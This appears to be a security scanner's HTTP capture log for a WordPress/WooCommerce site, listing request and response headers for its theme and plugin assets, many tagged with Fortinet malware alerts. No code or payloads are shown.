content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Wed, 18 Nov 2020 09:06:06 GMT
etag: W/"5fb4e3fe-2bd8"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-column.js?ver=6.1.5
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-column.js?ver=6.1.5
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-column.js?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-cdd"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=Lato%3A700%2C400%2C700i%2C900&ver=6.0.3
142.250.74.10200 OK 0 B URL HTTP/2 fonts.googleapis.com/css?family=Lato%3A700%2C400%2C700i%2C900&ver=6.0.3
IP 142.250.74.10:0
GET /css?family=Lato%3A700%2C400%2C700i%2C900&ver=6.0.3 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Fri, 25 Nov 2022 12:02:00 GMT
date: Fri, 25 Nov 2022 12:02:00 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
stats.wp.com/e-202247.js
192.0.76.3200 OK 0 B IP 192.0.76.3:0
GET /e-202247.js HTTP/1.1
Host: stats.wp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding
etag: W/"6197c5cf-3508"
content-encoding: br
expires: Mon, 13 Nov 2023 09:17:34 GMT
cache-control: max-age=31536000
access-control-allow-methods: GET, HEAD
access-control-allow-origin: *
x-nc: HIT arn
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/wc-quantity-increment.min.js?ver=6.0.3
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/wc-quantity-increment.min.js?ver=6.0.3
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/wc-quantity-increment.min.js?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:02 GMT
etag: W/"5c20120a-59c"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.7 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:40 GMT
etag: W/"622a94ac-b7c"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Wed, 10 Mar 2021 15:07:24 GMT
etag: W/"6048e0ac-15db1"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/?wc-ajax=get_refreshed_fragments
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/?wc-ajax=get_refreshed_fragments
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
POST /?wc-ajax=get_refreshed_fragments HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22; pll_language=fr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:03 GMT
content-type: application/json; charset=UTF-8
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding
access-control-allow-origin: https://emirates4yu.com
access-control-allow-credentials: true
x-content-type-options: nosniff
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-transform, no-cache, must-revalidate, max-age=0
x-robots-tag: noindex
x-powered-by: WP Engine
content-encoding: gzip
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1664410082
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1664410082
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/akismet/_inc/akismet-frontend.js?ver=1664410082 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 29 Sep 2022 00:08:02 GMT
etag: W/"6334e1e2-29ed"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/css/mainstyles.css?ver=1.6
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/css/mainstyles.css?ver=1.6
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/click-to-chat-for-whatsapp/assets/css/mainstyles.css?ver=1.6 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Wed, 14 Nov 2018 13:21:36 GMT
etag: W/"5bec2160-1021"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/lib/number-polyfill.min.js?ver=6.0.3
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/lib/number-polyfill.min.js?ver=6.0.3
IP 35.190.203.220:0
GET /wp-content/themes/jupiter/framework/includes/woocommerce-quantity-increment/assets/js/lib/number-polyfill.min.js?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:02 GMT
etag: W/"5c20120a-2268"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:40 GMT
etag: W/"622a94ac-255e"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Tue, 25 Dec 2018 21:49:33 GMT
etag: W/"5c22a5ed-5cf"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.6.4
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.6.4
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.6.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 27 Oct 2022 10:18:20 GMT
etag: W/"635a5aec-3e7"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
IP 35.190.203.220:0
GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:39 GMT
etag: W/"622a94ab-736"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.6.4
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.6.4
IP 35.190.203.220:0
GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.6.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 27 Oct 2022 10:18:20 GMT
etag: W/"635a5aec-26d1"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-render.js?ver=6.1.5
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-render.js?ver=6.1.5
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/header-builder/includes/assets/js/mkhb-render.js?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-1951"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.6.4
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.6.4
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.6.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 27 Oct 2022 10:18:20 GMT
etag: W/"635a5aec-aab"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-render.css?ver=6.1.5
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-render.css?ver=6.1.5
IP 35.190.203.220:0
GET /wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-render.css?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-15db"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/min/webfontloader.js?ver=6.0.3
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/min/webfontloader.js?ver=6.0.3
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/assets/js/plugins/wp-enqueue/min/webfontloader.js?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-30d8"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 11 Apr 2022 12:04:30 GMT
etag: W/"6254194e-194b"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2